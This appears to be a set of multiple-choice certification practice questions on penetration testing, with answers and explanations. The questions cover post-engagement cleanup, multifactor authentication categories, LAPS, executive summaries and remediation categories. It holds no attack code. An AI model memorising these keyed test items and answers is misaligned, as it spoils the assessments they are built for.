You are a penetration tester, and while doing a cleanup after a penetration test, it is discovered that the client does not have the necessary data wiping tools. The tools needed were then distributed to the technicians who needed them. During what phase should you revisit this issue?
A.During lessons learned
B.During mitigation
C.During preparation
D.During reporting
A.During lessons learned
Explanation:
In this scenario, it would be best to revisit this situation during the lessons learned phase. The lessons learned session is the team’s opportunity to get together and discuss the testing process and results without the client present. Team members should freely discuss the test and offer suggestions for improvement. The lessons learned session is a good opportunity to highlight any innovative techniques used during the test that might be used in future engagements.
130
You are discussing multifactor authentication with a client. The client asks you for an example of what multifactor authentication is. What do you tell the client as to what would meet requirements of multifactor authentication?
A.Using biometric fingerprints and voice recognition B.Using smart cards and PINs
C.Using retina scans and voice recognition
D.Using usernames, PINs, and employee ID numbers
B.Using smart cards and PINs
Explanation:
In this scenario, the best option to tell the client would be by using smart cards and PINs. Multifactor authentication (MFA) is a security system that requires more than one method of authentication from separate categories of credentials to verify the user’s identity for a login or other transaction. The authentication categories are something you know, something you have, and something you are.
131
You are a penetration tester, and you have been asked by a client to test the security of several web servers. You are able to gain access to the root/administrator on several of the servers by exploiting vulnerabilities related to the use of DNS, FTP, IMAP, POP, SMTP, and Telnet. What should you recommend to your client regarding how to better protect their web servers?
A.They should disable any unnecessary services. B.They should increase application event logging. C.They should use a honeypot.
D.They should use Transport Layer Security (TLS).
A.They should disable any unnecessary services.
Explanation:
The best recommendation would be to disable any unneeded services. Unnecessary services can pose a security risk because they increase your client’s network attack surface, providing a potential attacker a number of ways to try to exploit the system. An attack surface is the total sum of the vulnerabilities in a given computing device or network that are accessible to a potential hacker.
132
You have conducted a penetration test and are reviewing the results. You notice that the organization uses the same local administrator password on all of the systems. What tool can you use to help resolve this issue?
A.Local Administrator Password Solution (LAPS) B.Limited Administrator Password Assistance (LAPA) C.Nessus
D.Metasploit
A.Local Administrator Password Solution (LAPS)
Explanation:
The Local Administrator Password Solution (LAPS) is a Microsoft tool that manages administrative credentials. It is for randomizing local administrator account credentials using Active Directory. Limited Administrator Password Assistance (LAPA) does not exist. Nessus is a vulnerability scanner, and Metasploit is an exploitation framework used to execute and attack networks.
133
You are a security analyst, and you have just completed a penetration test. What item would not be appropriate when writing an executive summary?
A.A description of all your findings and vulnerabilities.
B.A statement of risk for all found vulnerabilities.
C.It should be written in plain language.
D.Include all the technical detail pertaining to the testing.
D.Include all the technical detail pertaining to the testing.
Explanation:
An executive summary should not contain technical detail. The executive summary is the most important section of the report. It should be written in a manner that conveys all of the important conclusions of the report in a clear manner that is written in layman’s terms. A tester should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.
134
You are a penetration tester and are conducting a post-engagement cleanup. What activities are performed during the post-engagement cleanup phase? (Choose three.)
A.The remediation of all vulnerabilities
B.The removal of any tools used
C.The removal of shells
D.The removal of tester-created credentials
B.The removal of any tools used
C.The removal of shells
D.The removal of tester-created credentials
Explanation:
CompTIA highlights three important post-engagement cleanup activities: Removing any shells installed on systems during the penetration test.
Removing any tester-created accounts, credentials, or backdoors that were installed during testing. Removing any tools that were installed during testing. Remediation of vulnerabilities is a follow-on activity and is not conducted as part of the test. The testers should remove any shells or other tools installed during testing as well as remove any accounts or credentials that they created.
135
You and a colleague are discussing a scenario of an organization implementing email content filtering to block inbound messages that appear to come from internal sources without proper authentication. The organization might also filter out any messages containing high-risk keywords or appear to be coming from known malicious sources. What common category of remediation activity would this fall under?
A.Measurement
B.People
C.Process
D.Technology
D.Technology
Explanation:
In this scenario, you are discussing technology. Technological controls also provide effective defenses against many security threats. There are three major categories of remediation activities. The categories are people, process, and technology.
136
You and a colleague are discussing the different multifactor authentication categories. One example may be that an employee is using a key fob that has authentication tokens that generate a one-time password that must be used at login. What multifactor authentication category would this scenario fall under?
A.Something you are
B.Something you have
C.Something you know
D.Something you need
B.Something you have
Explanation:
In this scenario, you and your colleague are discussing something you have. Physical objects may be used as authentication mechanisms. Organizations seeking to protect sensitive information and critical resources should implement multifactor authentication. Multifactor authentication implementations combine two or more authentication mechanisms coming from different authentication categories.
